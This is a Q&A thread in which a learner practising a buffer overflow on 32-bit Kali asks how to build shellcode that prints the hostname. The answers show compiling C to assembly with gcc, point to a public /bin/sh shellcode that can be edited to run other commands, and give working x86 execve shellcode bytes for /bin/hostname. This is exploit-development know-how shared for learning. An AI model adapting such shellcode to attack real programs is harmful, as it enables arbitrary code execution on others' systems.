# Buffer Overflow - Printing host/user-name

Tags: buffer-overflow, shellcode

I'm trying to perform a Buffer overflow attack on a simple C program to get a bit hands on knowledge on how it works. So far I a python script which has a bunch of \x90s and the return address which points to one of the address slots which holds a part of the NOP sled. I have code which prints the hostname but it is not written by me and I do not understand the code itself.

I had an idea that I could write a C program which prints the hostname with uname -a, which I could disassemble into assembly and then translate this to hex but that gives me **a lot** of assembly code. This would give me more knowledge of what is actually happening but with the output in regards, it feels like I'm doing something wrong.

**How would I go about to create/generate shell code which does just that, print my host name?** I'm working on a Kali Linux 32 bit system.

Comment: Are you aware of the 'hostname' linux command ?

Answer (score 0):

You don't have to write an entire C program and then dissemble it.

You can write a simple C function that does only what you want, and then ask GCC to compile but **not** assemble and link it using the `-S` parameter.

You can also turn on debug flag `-g` so the assembly will have some debug data which will make it easier to read.

Take this sample code:

```
#include <unistd.h>

void get_hostname() {
    char buffer[100];
    gethostname(buffer, 100);
}
```

If this is a complete contents of hn.c file, you can use the following command to generate hn.asm file:

```
gcc -S -g hn.c -o hn.asm
```

This file will still have a bunch of stuff you do not need, but it will also have an easy to find and clear assembly of the function you want:

```
.Ltext0:
    .globl  get_hostname
    .type   get_hostname, @function
get_hostname:
.LFB0:
    .file 1 "hn.c"
    .loc 1 3 0
    .cfi_startproc
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register 6
    subq    $112, %rsp
    .loc 1 3 0
    movq    %fs:40, %rax
    movq    %rax, -8(%rbp)
    xorl    %eax, %eax
    .loc 1 5 0
    leaq    -112(%rbp), %rax
    movl    $100, %esi
    movq    %rax, %rdi
    call    gethostname
    .loc 1 6 0
    movq    -8(%rbp), %rax
    xorq    %fs:40, %rax
    je  .L2
    call    __stack_chk_fail
.L2:
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
```

You can than pass this to an assembler to generate the machine code you want.

Note the `.loc` directives: they are used to match the assembly code with the line number of the original C code. You can use them just like the debugger does to know which assembly lines represent which C line of code.

Answer (score 0):

You can just use a simple /bin/sh shellcode and run any command you want.
Here is a simple [shellcode](http://shell-storm.org/shellcode/files/shellcode-827.php) for that.
If you still want just that command you can change the command string that you push in the shellcode (uname -a instead of /bin/sh).

Answer (score 0):

Here shellcode I wrote for `x86` machine.

Shellcode `/bin/hostname` :

```
"\x31\xc0\x50\x6a\x65\x68\x74\x6e\x61\x6d\x68\x2f\x68\x6f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x50\x89\xe3\xb0\x01\xcd\x80"
```

Assembly :

```
global _start
section .text

_start:

xor     eax, eax  
push    eax
push    byte 0x65
push    dword 0x6d616e74
push    dword 0x736f682f
push    dword 0x6e69622f
mov     ebx, esp
push    eax
push    ebx
mov     ecx, esp
mov     al, 0xb
int     0x80

xor     eax, eax
push    eax
mov     ebx, esp
mov     al, 0x1
int     0x80
```